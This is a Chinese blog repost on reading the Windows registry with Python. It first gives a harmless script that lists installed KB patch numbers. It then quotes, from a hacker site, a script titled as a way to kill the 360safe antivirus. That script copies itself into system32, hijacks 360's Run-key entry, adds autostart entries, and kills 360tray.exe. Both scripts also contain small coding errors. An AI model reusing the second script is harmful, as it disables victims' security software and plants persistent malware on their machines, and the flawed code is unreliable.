使用Python访问Windows的注册表

来源:互联网 发布:数据记录器 编辑:程序博客网 时间:2024/05/18 20:53
在Python的标准库中,_winreg.pyd可以操作Windows的注册表,另外第三方的win32库封装了大量的Windows API,使用起来也很方便。不过这里介绍的是使用_winreg操作注册表,毕竟是Python自带的标准库,无需安装第三方库。

下面的例子是通过Python获取Windows XP下已经安装的补丁号。Windows的补丁号都在“HKEY_LOCAL_MACHINE\SOFTWARE\\Microsoft\\ Updates”下,通过循环下面所有的目录节点,如果找到的名称符合正则表达式KB(\d{6}).*,则表示是一个补丁号。

从例子可以看出操作起来非常的简单和快速。

# -*- coding: utf-8 -*-
# 获取Windows的已打的补丁号
from _winreg import *
import re

def subRegKey(key, pattern, patchlist):
    # 个数
    count = QueryInfoKey(key)[0]
    for index in range(count):
        # 获取标题
        name = EnumKey(key, index)
        result = patch.match(name)
        if result:
            patchlist.append(result.group(1))
        sub = OpenKey(key, name)
        subRegKey(sub, pattern, patchlist)
        CloseKey(sub)

if __name__ == '__main__':
    patchlist = []
    updates = 'SOFTWARE\\Microsoft\\Updates'
    patch = re.compile('(KB\d{6}).*')
    key = OpenKey(HKEY_LOCAL_MACHINE, updates)
    subRegKey(key, patch, patchlist)
    print 'Count: ' + str(len(patchlist))
    for p in patchlist:
        print p
    CloseKey(key)

http://tenyears.cn/index.php/2007/01/26/python-win-registry.html

用python修改注册表干掉360safe
import _winreg
import os
import shutil

#复制自身
shutil.copyfile('K3.exe','c:\WINDOWS\system32\K3.exe')

#把360启动改为自身
run = _winreg.OpenKey(
      _winreg.HKEY_LOCAL_MACHINE,
      "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE
      )

_winreg.SetValueEx(
      run,"360Safetray",0,_winreg.REG_SZ,
      r"C:\WINDOWS\system32\k3.exe"
      )

#添加自启动
self = _winreg.OpenKey(
      _winreg.HKEY_LOCAL_MACHINE,
      "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE
      )

_winreg.SetValueEx(
      run,"k3",0,_winreg.REG_SZ,
      r"C:\WINDOWS\system32\k3.exe"
      )
#添加所有用户启动
allrun = _winreg.OpenKey(
      _winreg.HKEY_LOCAL_MACHINE,
      "Microsoft\Windows\CurrentVersion\policies\Explorer\Run",0,_winreg.KEY_WRITE
      )
_winreg.SetValueEx(
      allrun,"k3",0,_winreg.REG_SZ,
      r"C:\WINDOWS\system32\k3.exe"
      )

#终止360进程
os.popen("ntsd -c q -pn 360tray.exe cmd")

引自:http://www.hacker.com.cn/article/view_13879.html


原创粉丝点击